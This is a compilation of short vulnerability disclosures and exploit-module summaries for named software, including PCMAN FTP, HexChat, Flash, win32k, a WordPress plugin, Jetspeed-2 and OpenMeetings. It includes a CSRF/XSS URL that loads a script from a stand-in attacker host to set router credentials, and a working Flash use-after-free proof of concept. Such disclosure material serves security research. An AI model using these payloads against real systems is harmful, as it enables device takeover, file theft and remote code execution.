This module exploits a buffer overflow vulnerability in the PUT command of the PCMAN FTP v2.0.7 Server. Exploitation requires authentication, but anonymous credentials are enabled by default.
If a user visits the page below, the administrative credential for the PQI Air Pen express is set to 'root:r00t'. The attacker can also abuse the multiple XSS issues in this device to exploit this vulnerability, with something like the following to set the same credential 'root:r00t': http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22http://attacker.com/csrf.js%22%3C/script%3E
The HexChat IRC client receives the available extensions from the IRC server (CAP LS message) and constructs the request string that later indicates which ones to use (CAP REQ message). This request string is stored in the fixed-size (256-byte) byte array 'buffer'. The array has enough space for all possible options combined, BUT it will overflow if some options are repeated.
Overflowing the title/artist tags in an *.mp3 file seems to crash the software (works on both the standalone and portable versions).
A use-after-free vulnerability exists in Color.setTransform when it is set to a transform that deletes the field it is called on. A proof-of-concept is provided in the text, and a sample swf and fla are attached.
There is a use-after-free in the TextField.maxChars setter. If the value maxChars is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:
    var times = 0;
    var mc = this.createEmptyMovieClip('mc', 101);
    var tf = mc.createTextField('tf', 102, 1, 1, 100, 100);
    tf.maxChars = {valueOf : func};
    function func(){
      if (times == 0){
        times++;
        return 7;
      }
      mc.removeMovieClip(); // Fix heap here
      return 7;
    }
The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggered in multiple different ways, such as by calling NtGdiGetTextMetricsW with a NULL pointer or by calling NtGdiGetTextExtentExW with a NULL pointer.
A vulnerability in the Advanced-Video-Embed plugin for WordPress allows an unauthenticated attacker to download arbitrary files from the server. This is due to a lack of input validation in the ave_publishPost() function in the /inc/classes/class.avePost.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the admin-ajax.php file with the action parameter set to ave_publishPost and the thumb parameter set to the path of the file to be downloaded.
This module exploits the unsecured User Manager REST API and a ZIP file path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier versions, to upload and execute a shell. Note: this exploit will create, use, and then delete a new admin user. Warning: in testing, exploiting the file upload clobbered the web interface beyond repair. No workaround has been found yet. Use this module at your own risk. No check will be implemented.
The Import/Export System Backups functionality in the OpenMeetings Administration menu (http://domain:5080/openmeetings/#admin/backup) is vulnerable to path traversal via specially crafted file names within ZIP archives. Uploading an archive containing a file named ../../../public/hello.txt writes the file 'hello.txt' to the http://domain:5080/openmeetings/public/ directory. This could be used to, for example, overwrite the /usr/bin/convert file (or any other 3rd-party integrated executable) with a shell script, which would be executed the next time an image file is uploaded and ImageMagick is invoked.